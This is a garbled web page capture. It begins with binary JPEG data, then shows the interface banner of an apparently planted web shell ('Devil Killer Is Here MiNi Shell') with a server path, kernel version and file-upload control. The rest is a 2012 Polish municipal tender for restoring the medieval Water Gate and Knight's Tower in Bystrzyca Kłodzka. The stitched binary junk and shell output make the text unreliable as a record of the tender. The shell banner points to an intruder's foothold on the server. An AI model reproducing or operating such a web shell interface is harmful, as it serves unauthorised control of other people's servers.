JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120629/227156-N-2012.html

<p class="kh_header"><b>Bystrzyca Kłodzka: Remont i adaptacja na cele kultury i turystyki bram i baszt stanowiących elementy średniowiecznego systemu fortyfikacyjnego w Bystrzycy Kłodzkiej</b><br>
<b>Numer ogłoszenia: 227156 - 2012; data zamieszczenia: 29.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bystrzyca Kłodzka , ul. Henryka Sienkiewicza 6, 57-500 Bystrzyca Kłodzka, woj. dolnośląskie, tel. 074 8117600, faks 074 8111588.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bystrzycaklodzka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://bip.ug-bystrzycaklodzka.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i adaptacja na cele kultury i turystyki bram i baszt stanowiących elementy średniowiecznego systemu fortyfikacyjnego w Bystrzycy Kłodzkiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy prac konserwatorsko - restauratorskich i robót budowlanych dla obiektów zabytkowych, tj. Bramy Wodnej przy ul. Podmiejskiej w Bystrzycy Kłodzkiej i Baszty (Wieży) Rycerskiej przy ul. Rycerskiej w Bystrzycy Kłodzkiej, stanowiących elementy średniowiecznego systemu fortyfikacyjnego, wyszczególnionych w dokumentacji projektowej i wykonawczej, programie prac konserwatorskich, przedmiarze robót, które należy wykonać zgodnie z wytycznymi i zaleceniami Wojewódzkiego Konserwatora Zabytków, dokumentacją techniczną i programem prac konserwatorskich dla zadania inwestycyjnego pn.: Remont i adaptacja na cele kultury i turystyki bram i baszt stanowiących elementy średniowiecznego systemu fortyfikacyjnego w Bystrzycy Kłodzkiej.
Przewidywany zakres prac konserwatorsko - restauratorskich i robót budowlanych:   dla obiektu Brama Wodna, obejmuje m.in.: 
1/ konserwację i restaurację hełmu wieży z rekonstrukcją kolorystyki, 
2/ wykonanie kamiennej posadzki wraz z izolacją obejścia hełmu, 
3/ konserwację ceglanego lica muru baszty z rekonstrukcją ubytków w cegle i spoin  i kształtem krenelażu, 
4/ konserwację i rekonstrukcję kamiennych ścian baszty, 
5/ konserwację i rekonstrukcję detalu architektonicznego, kamiennego, w tym zewnętrznych schodów, 
6/ rekonstrukcję drewnianych wrót, 
7/ montaż stylowej, stałej brony we wnęce elewacji zachodniej, 
8/ odtworzenie  latryny w formie wykuszu, 
9/ wykonanie tynków wewnętrznych, 
10/ montaż schodów drewnianych z balustradami, 
11/ konserwację stropu drewnianego, 
12/ wykonanie posadzki kamiennej oraz drewnianej podłogi, 
13/ wykonanie drewnianych drzwi, obitych blachą z kratownicy oraz drzwi o frontach stylizowanych, 
14/ wykonanie stolarki okiennej stylizowanej,
15/ konserwację i restaurację muru wójtostwa, 
16/ wykonanie instalacji elektrycznej zewnętrznej i wewnętrznej oraz instalacji odgromowej,
17/ wykonanie badań  petrograficznych, wilgotnościowych, zawartości soli,  
18/ roboty wykończeniowe i porządkowe.
Przewidywany zakres prac konserwatorsko - restauratorskich i robót budowlanych:   dla obiektu Baszta (Wieża) Rycerska, obejmuje m.in.:
1/ konserwację i restaurację hełmu wieży z rekonstrukcją kolorystyki, 
2/ wykonanie kamiennej posadzki wraz z izolacją obejścia hełmu, 
3/ konserwację ceglanego lica muru baszty z rekonstrukcją ubytków w cegle i spoin,
4/ konserwację i rekonstrukcję detalu architektonicznego - attyka, gzyms, biforia, otwory okienne, 
5/ konserwację i rekonstrukcję kamiennych ścian baszty, 
6/ ekspozycję reliktów muru miejskiego w postaci strzępi na elewacji od strony Muzeum, 
7/ konserwację i rekonstrukcję detalu architektonicznego, kamiennego, 
8/ konserwację arkady nad przejściem po zachodniej stronie wieży, 
9/ montaż schodów drewnianych z balustradami, 
10/ wykonanie posadzki kamiennej oraz drewnianej podłogi na legarach, 
11/ wykonanie drewnianych drzwi, obitych blachą z kratownicy w romboidalnej formie oraz   drzwi o frontach stylizowanych, 
12/ wykonanie stolarki okiennej stylizowanej oraz żaluzji drewnianych,
13/ wykonanie instalacji elektrycznej zewnętrznej i wewnętrznej oraz instalacji odgromowej,
14/ wykonanie badań  petrograficznych, wilgotnościowych, zawartości soli,  
15/ roboty wykończeniowe i porządkowe.
Szczegółowy opis przedmiotu zamówienia zawiera Część III Specyfikacji Istotnych Warunków  Zamówienia, zwanej w dalszej  części zamówienia SIWZ, a w nim, m.in.: 
1. Opracowania konserwatorskie:
1/ Wieża Rycerska w Bystrzycy Kłodzkiej. Wyniki badań architektonicznych oraz wnioski konserwatorskie, autorstwa dr inż. arch. Andrzeja Legendziewicza, 
2/Brama Wodna w Bystrzycy Kłodzkiej. Wyniki badań architektonicznych oraz wnioski
konserwatorskie, autorstwa dr inż. arch. Andrzeja Legendziewicza,
3/ Program prac konserwatorskich Baszty Rycerskiej oraz Bramy Wodnej w Bystrzycy
Kłodzkiej; autorstwa Doroty Gryczewskiej;
2. Projekty budowlane:
1/ Remont i adaptacja na cele kultury i turystyki bram i baszt stanowiących elementy średniowiecznego systemu fortyfikacyjnego w Bystrzycy Kłodzkiej - Brama Wodna, Bystrzyca Kłodzka, ul. Podmiejska, opracowany przez  mgr inż. arch. Joannę Pędrak,mgr inż. Pawła Tyczyńskiego; 
2/ Projekt budowlany - instalacje elektryczne, Remont i adaptacja na cele kultury    i turystyki, Brama Wodna, Bystrzyca Kłodzka, ul. Podmiejska, opracowany przez  mgr inż. Ryszarda Kulczaka;
3/ Remont i adaptacja na cele kultury i turystyki bram i baszt stanowiących elementy średniowiecznego systemu fortyfikacyjnego w Bystrzycy Kłodzkiej - Baszta Rycerska, Bystrzyca Kłodzka,  ul. Rycerska, opracowany przez  mgr inż. arch. Joannę Pędrak,
mgr inż. Pawła Tyczyńskiego, (Uwaga: poz. 4.7 dokumentacji: architektura Dzwon w
punktach 1, 2, 3, 4, 5 została zrealizowana przez Zamawiającego i nie jest przedmiotem niniejszego zamówienia); 
4/ Projekt budowlany - instalacje elektryczne, Remont i adaptacja na cele kultury i turystyki,  Baszta Rycerska, Bystrzyca Kłodzka, ul. Rycerska, opracowany przez  mgr inż. Ryszarda Kulczaka.
3) Specyfikacja techniczna wykonania i odbioru robót:
a) Brama Wodna - część budowlana,
b) Brama Wodna - instalacje elektryczne;
c) Baszta Rycerska - część budowlana,
d) Baszta Rycerska - instalacje elektryczne;
4/ Przedmiar robót Baszta Rycerska (część budowlana, instalacje elektryczne),
5/ Przedmiary robót Brama Wodna (część budowlana, instalacje elektryczne).
Prace konserwatorsko - restauratorskie i roboty budowlane jak wyżej realizowane będą: 1/ w Bystrzycy Kłodzkiej przy ul. Podmiejskiej - Brama Wodna - obiekcie wpisanym do rejestru zabytków pod numerem 647 decyzją z dnia 26.02.1960 r. 2/ w Bystrzycy Kłodzkiej przy ul. Rycerskiej - Baszcie Rycerskiej - obiekcie wpisanym do rejestru zabytków pod numerem A/1177 decyzją z dnia 25.08.2009 r. 
Przewidywany zakres prac obejmuje także koszty związane z a) urządzeniem, utrzymaniem i zabezpieczeniem terenu budowy i robót wraz z zapleczem budowy, w tym: zabezpieczeniem przed zniszczeniem materiałów budowlanych, sprzętu budowlanego oraz przed dostępem i działaniem osób trzecich; zabezpieczeniem robót pod względem BHP; doprowadzeniem i utrzymaniem energii i wody oraz innych niezbędnych mediów dla potrzeb  technologicznych, zaplecza i terenu budowy; wyłączeniem mediów (jeżeli wystąpi); utrzymaniem terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwanie na bieżąco zbędnych materiałów, odpadów i śmieci; naprawą uszkodzonych na skutek prowadzonych robót urządzeń podziemnych; zapewnieniem dozoru a także właściwych warunków bezpieczeństwa i higieny pracy; zorganizowaniem i przeprowadzeniem niezbędnych prób, badań (zgodnie ze Specyfikacjami Technicznymi Wykonania i Odbioru Robót) i odbiorów oraz ewentualnego uzupełnienia dokumentacji odbiorowej dla zakresu robót objętych umową, jak również dokonywaniem odkrywek w przypadku nie zgłoszenia do odbioru robót zanikających lub ulegających zakryciu; demontażem obiektów i urządzeń tymczasowych budowy, uporządkowaniem terenu budowy po zakończeniu robót i przekazaniu Zamawiającemu, najpóźniej w dniu odbioru; udzieleniem wszelkiej pomocy w przygotowaniu niezbędnych dokumentów wymaganych przez  jednostki finansujące przy realizacji i rozliczaniu inwestycji; zapewnieniem pełnej obsługi geodezyjnej budowy przez uprawnione służby geodezyjne (jeżeli wystąpi); wykonaniem pełnej dokumentacji powykonawczej w 3 (trzech) egzemplarzach, w tym: operatu kolaudacyjnego w 3 egzemplarzach, zawierającego m.in. sprawozdanie techniczne, receptury i ustalenia technologiczne, wyniki badań kontrolnych oraz badań i oznaczeń laboratoryjnych, atesty jakościowe i aprobaty techniczne, dziennik budowy, rozliczenie końcowe, oświadczenia, inne dokumenty wynikające z ustawy Prawo budowlane - art. 57 oraz opracowanie i wykonanie opisowo - fotograficznej dokumentacji konserwatorskiej z prowadzonych prac dla obu obiektów (3 egz. w wersji papierowej oraz elektronicznej - na nośniku CD); odszkodowaniami za szkody wyrządzone osobom trzecim na skutek prowadzenia w/w robót oraz inne koszty wynikające z Umowy. Termin wykonania umowy- termin zakończenia: 31.10.2013 r. Realizacja robót oraz odbiory częściowe tych robót dokonywane będą wg harmonogramu rzeczowo - finansowego robót, stanowiącego Załącznik do umowy o wykonanie przedmiotu zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.52.00.00-2, 45.45.30.00-7, 45.21.23.50-4, 45.00.00.00-7, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości  31 000 PLN
Wadium może być wnoszone w jednej lub kilku następujących formach:
- pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 257, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz.1505 oraz z 2010 r. Nr 96, poz. 620).

Wadium wnoszone w pieniądzach wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego, tj: Powiatowy Bank Spółdzielczy w Strzelinie Oddział w Bystrzycy Kłodzkiej, Osiedle Szkolne 10B/17, 57-500 Bystrzyca Kłodzka, nr rachunku: 07 9588 0004 9700 0299 2000 0090.
W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku bankowym Zamawiającego, przy czym kwota wadium winna znaleźć się na rachunku bankowym przed terminem składania ofert. 
W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu 
potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert 
w siedzibie Zamawiającego - Gminy Bystrzyca Kłodzka, tj. w Urzędzie Miasta i Gminy w Bystrzycy Kłodzkiej, Wydział Turystyki, Mały Rynek 2/1, 57-500 Bystrzyca Kłodzka, a kserokopię dokumentu dołączyć do oferty, w taki sposób aby można było dokument odłączyć od oferty bez naruszania tej oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia tego warunku Wykonawca musi załączyć do oferty: - aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach. Nie załączenie w/w dokumentu, w przypadku jeżeli odrębne przepisy wymagają wpisu do rejestru, będzie skutkowało odrzuceniem oferty lub wykluczeniem wykonawcy z postępowania i jednoczesnym odrzuceniem oferty, z zastrzeżeniem art. 26 ust. 3 P.z.p.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający zaprasza do udziału w postępowaniu Wykonawców, którzy dysponują personelem odpowiednim  do realizacji zamówienia: - posiadają kwalifikacje w zakresie prowadzenia prac konserwatorskich zgodnie z  rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165, poz. 987).  
W celu potwierdzenia spełnienia tego warunku Wykonawca musi wykazać, że posiada doświadczenie w prowadzeniu prac konserwatorsko - restauratorskich i robót budowlanych przy konserwacji - restauracji ceglanych i kamiennych obiektów zabytkowych i musi wykazać, że w okresie ostatnich 5 (pięciu) lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie - zrealizował jako Wykonawca prace konserwatorsko - restauratorskie i roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot niniejszego zamówienia, tj. zrealizował min. 4 (cztery) następujące roboty: 
1/ przynajmniej 1 (jedną) robotę budowlaną i realizację konserwatorsko - restauratorską przy obiekcie zabytkowym wpisanym do rejestru zabytków i 
2/ przynajmniej 2 (dwie) prace konserwatorskie w zakresie konserwacji ceglanych i kamiennych obiektów zabytkowych wpisanych do rejestru zabytków - przy czym  minimalna wartość dla każdej z w/w  prac musi wynosić 300 000 zł. brutto dla każdej z nich i 3/ przynajmniej 1 (jedną) realizację robót budowlanych polegającą na wykonaniu instalacji elektrycznej w obiekcie zabytkowym wpisanym do rejestru zabytków, o wartości  minimum 40 000 zł. brutto.
Wykaz wykonanych robót należy sporządzić według  wzoru określonego w Załączniku Nr 5 do SIWZ.  
Wykonawca zobowiązany jest załączyć do tego wykazu dokumenty potwierdzające, że wykazane roboty budowlane  i prace konserwatorsko - restauratorskie zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje, protokoły odbioru robót bez usterek i wad), z podanym terminem realizacji i określeniem obiektu tj:. a)  min. 3 szt. protokołu odbioru bez usterek i wad, potwierdzonych przez upoważnionych pracowników WKZ lub MKZ lub min. 3 szt. referencji dla przynajmniej trzech robót/prac konserwatorskich, o wartości zamówienia brutto min. 300 000,00 PLN każda, tj:
-  min. 1 szt. referencji lub 1 szt. protokołu odbioru robót bez usterek i wad dla  robót budowlanych, polegających na wykonaniu robót budowlanych i realizacji konserwatorsko - restauratorskiej przy obiektach zabytkowych wpisanych do rejestru zabytków,  - min. 2 szt. referencji lub 2 szt. protokołu odbioru robót bez usterek i wad dla robót budowlanych, polegających na wykonaniu konserwacji i renowacji ceglanych i kamiennych obiektów zabytkowych wpisanych do rejestru zabytków.
Przy czym  minimalna wartość każdej z tych prac musi wynosić  300 000 zł. brutto dla każdej z nich i 
b)  min. 1 szt. referencji lub 1 szt. protokołu odbioru bez usterek i wad dla przynajmniej jednego wykonanego oświetlenia wewnętrznego i zewnętrznego w obiekcie zabytkowym wpisanych do rejestru zabytków o wartości min. 40 000 zł. brutto.
W/w protokoły odbioru lub referencje muszą być podpisane przez Inwestora/Zamawiającego.
Referencje lub protokoły odbioru muszą potwierdzać zakres wykonanych przez Wykonawcę prac, termin wykonania tych robót, wartość tych robót, nazwę zadania, muszą być podpisane przez Zamawiającego/ Inwestora robót oraz muszą potwierdzać, że roboty i prace konserwatorskie zostały wykonane przez Wykonawcę zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach. Nie załączenie w/w dokumentów będzie skutkowało odrzuceniem oferty lub wykluczeniem Wykonawcy z postępowania i jednoczesnym odrzuceniem oferty, z zastrzeżeniem art. 26 ust. 3 P.z.p.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia Wykonawcom warunków udziału w postępowaniu w zakresie potencjału technicznego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia tego warunku Wykonawca musi wykazać, że dysponuje osobami, które będą uczestniczyć w realizacji zamówienia i posiadają wymagane doświadczenie i uprawnienia, w szczególności:
1) Kierownik budowy - posiadający aktualne uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno - budowlanej bez ograniczeń, określone przepisami  ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U z 2010 r. Nr 243, poz. 1623, z późn. zm.), -  przynależący do właściwej Izby Samorządu Zawodowego. Powyższe oświadczenie stanowi Załącznik nr 6 do SIWZ.
Ponadto zgodnie z Decyzją Nr 151/11 z dn. 23.02.2011 r. i Decyzją Nr 152/11 z dn. 23.02.2011 r. wydaną przez Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu Delegatura w Wałbrzychu - Kierownik budowy, w całym swoim okresie zawodowym, musi wykazać się co najmniej 2-letnią praktyką na budowie przy zabytkach nieruchomych (przez zabytek nieruchomy rozumie się  obiekt wpisany do rejestru zabytków). Okresy odbytych praktyk nie mogą się  nakładać w czasie (każdy miesiąc liczony jest tylko raz). Powyższe oświadczenie stanowi Załącznik nr 7 do SIWZ, do którego należy dołączyć   1/ min. 1 szt. referencji lub innych dokumentów (np. protokołu odbioru robót bez usterek i wad) potwierdzających, że osoba Kierownika budowy kierowała w/w robotami (dotyczy robót prowadzonych przy zabytku wpisanym do rejestru zabytków). Załączone referencje lub protokoły odbioru muszą dotyczyć robót wymienionych w Załączniku nr 7 do SIWZ. 
Zamawiający załącza do SIWZ kserokopię Decyzji Nr 151/11 z dn. 23.02.2011 r. i Decyzji Nr 152/11 z dn. 23.02.2011 r. wydanej przez Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu Delegatura w Wałbrzychu, ul. Zamkowa 3, 58-300 Wałbrzych;
2) Kierownik robót elektroenergetycznych posiadający aktualne uprawnienia budowlane do kierowania robotami w specjalności   instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, - przynależący do właściwej Izby Samorządu Zawodowego. Powyższe oświadczenie stanowi Załącznik nr 6 do SIWZ. 
Ponadto zgodnie z Decyzją nr 151/11 z dn. 23.02.2011 r. i Decyzją Nr 152/11 z dn. 23.02.2011 r. wydaną przez Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu Delegatura w Wałbrzychu - Kierownik robót, w całym swoim okresie zawodowym, musi wykazać się co najmniej 2-letnią praktyką na budowie przy zabytkach nieruchomych (przez zabytek nieruchomy rozumie się  obiekt wpisany do rejestru zabytków). Okresy odbytych praktyk nie mogą się  nakładać w czasie (każdy miesiąc liczony jest tylko raz). Powyższe oświadczenie stanowi Załącznik nr 7a do SIWZ. Do oświadczenia  należy załączyć również  min. 1 szt. referencji lub innych dokumentów (np. protokół odbioru robót bez usterek i wad) potwierdzających, że osoba Kierownika robót elektrycznych i elektroenergetycznych wykonała lub kierowała w/w robotami (dotyczy robót prowadzonych przy zabytku nieruchomym). Załączone referencje lub protokoły odbioru muszą dotyczyć robót wymienionych w Załączniku nr 7a do SIWZ.
3) Osoba uprawniona do prowadzenia prac konserwatorskich - posiadającą: 1) tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku konserwacja i restauracja dzieł sztuki lub wyższych studiów w specjalności w zakresie konserwacji zabytków oraz odbytą po ukończeniu tych studiów co najmniej 12 - miesięczną praktykę zawodową w zakresie konserwacji i badań zabytków lub posiadającą 2) świadectwo  ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający posiadanie kwalifikacji zawodowych w zawodach odpowiadających danej dziedzinie  lub  dyplom  mistrza w zawodzie odpowiadającym danej dziedzinie oraz odbytą co najmniej 5-letnią praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków. Okresy odbytych praktyk nie mogą się nakładać w czasie (każdy miesiąc liczony jest tylko raz). Praktyka powyższa dotyczy całego okresu zawodowego. Powyższe oświadczenie stanowi Załącznik nr 6 i 7 do SIWZ. 
Do wykazu  należy dla poszczególnych osób dołączyć: - min. 1 szt. referencji lub innych dokumentów (protokoły odbioru robót) potwierdzających, że osoba Kierownika budowy, Kierownika robót kierowała w/w robotami. Dokumenty te muszą potwierdzać miejsce wykonywania wyszczególnionych robót, czas ich wykonywania, zakres tych robót oraz stwierdzenie, że roboty te zostały wykonane z należytą starannością i były w sposób prawidłowy kierowane przez wymienioną osobę,  - min. 1 szt. referencji lub innych dokumentów potwierdzających odbycie praktyki zawodowej, potwierdzających, że osoba uprawniona do prowadzenia prac konserwatorskich odbyła praktykę zawodową w zakresie konserwacji i badań zabytków. Dokumenty te muszą potwierdzać miejsce odbytej praktyki, zakres objęty praktyką zawodową, czas jej trwania, zakres prac realizowanych podczas praktyki zawodowej.    
Ocena  spełniania warunku dokonana  zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach. Nie załączenie w/w dokumentów będzie skutkowało odrzuceniem oferty lub wykluczeniem Wykonawcy z postępowania i jednoczesnym odrzuceniem  oferty , z zastrzeżeniem art. 26 ust. 3  ustawy P.z.p.
